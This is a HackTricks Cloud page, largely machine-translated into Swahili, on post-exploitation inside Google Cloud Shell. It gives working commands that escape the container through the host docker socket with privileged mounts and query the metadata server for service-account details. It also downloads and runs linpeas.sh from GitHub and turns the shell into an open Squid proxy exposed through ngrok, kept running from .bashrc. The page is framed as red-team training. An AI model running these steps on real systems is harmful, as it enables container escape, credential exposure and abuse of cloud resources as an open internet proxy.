GCP - Cloud Shell Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud Shell

Kwa maelezo zaidi kuhusu Cloud Shell angalia:

GCP - Cloud Shell Enum

Container Escape

Kumbuka kwamba Google Cloud Shell inafanya kazi ndani ya kontena, unaweza kuondoka kwa urahisi kwenye mwenyeji kwa kufanya:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Hii haitambuliki kama udhaifu na google, lakini inakupa mtazamo mpana wa kile kinachotokea katika mazingira hayo.

Zaidi ya hayo, angalia kwamba kutoka kwa mwenyeji unaweza kupata tokeni ya akaunti ya huduma:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Na mipaka ifuatayo:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Pata metadata kwa kutumia LinPEAS:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Baada ya kutumia https://github.com/carlospolop/bf_my_gcp_permissions na token ya Akaunti ya Huduma hakuna ruhusa iliyogundulika...

Tumia kama Proxy

Ikiwa unataka kutumia mfano wako wa google cloud shell kama proxy unahitaji kukimbia amri zifuatazo (au ziweke kwenye faili .bashrc):

sudo apt install -y squid

Just for let you know Squid is a http proxy server. Create a squid.conf file with the following settings:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

nakala faili la squid.conf kwenye /etc/squid

sudo cp squid.conf /etc/squid

Hatimaye, endesha huduma ya squid:

sudo service squid start

Tumia ngrok kuruhusu proxy ipatikane kutoka nje:

./ngrok tcp 3128

Baada ya kuendesha nakala ya url ya tcp://. Ikiwa unataka kuendesha proxy kutoka kwa kivinjari, inapendekezwa kuondoa sehemu ya tcp:// na bandari na kuweka bandari hiyo katika uwanja wa bandari wa mipangilio ya proxy ya kivinjari chako (squid ni seva ya proxy ya http).

Kwa matumizi bora wakati wa kuanzisha, faili ya .bashrc inapaswa kuwa na mistari ifuatayo:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

The instructions were copied from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Angalia ukurasa huo kwa mawazo mengine ya ajabu ya kuendesha aina yoyote ya programu (maktaba na hata windows) katika Cloud Shell.

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki hila za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousGCP - Cloud Run Post Exploitation NextGCP - Cloud SQL Post Exploitation

Last updated 3 days ago